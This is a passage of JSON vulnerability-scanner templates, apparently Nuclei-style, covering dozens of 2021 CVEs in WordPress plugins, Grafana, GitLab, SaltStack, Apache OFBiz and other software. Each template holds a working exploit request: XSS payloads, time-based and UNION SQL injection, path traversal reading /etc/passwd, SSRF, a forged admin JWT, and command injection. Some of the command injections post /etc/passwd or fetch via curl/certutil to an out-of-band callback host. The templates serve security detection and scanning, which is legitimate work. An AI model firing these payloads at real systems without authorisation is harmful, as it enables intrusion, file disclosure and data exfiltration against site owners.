id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"CVE-2021-24499\"); ?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["71abe5077dae2754c36d731cc1534d4d"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey<1.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=4"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["curl|CertUtil"]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25281","info":{"name":"SaltStack Salt <3002.5 - Auth Bypass","severity":"critical"},"requests":[{"raw":["POST /run HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["return","tag","jid","salt","wheel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"word","words":["-----BEGIN RSA PRIVATE KEY-----","-----END RSA PRIVATE KEY----"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22707","info":{"name":"EVlink City < R8 V3.4.0.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n"],"host-redirects":true,"max-redirects":2,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["?worker=Cluster\" name=\"cluster\" id=\"id_cluster"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41826","info":{"name":"PlaceOS 1.2109.1 - Open 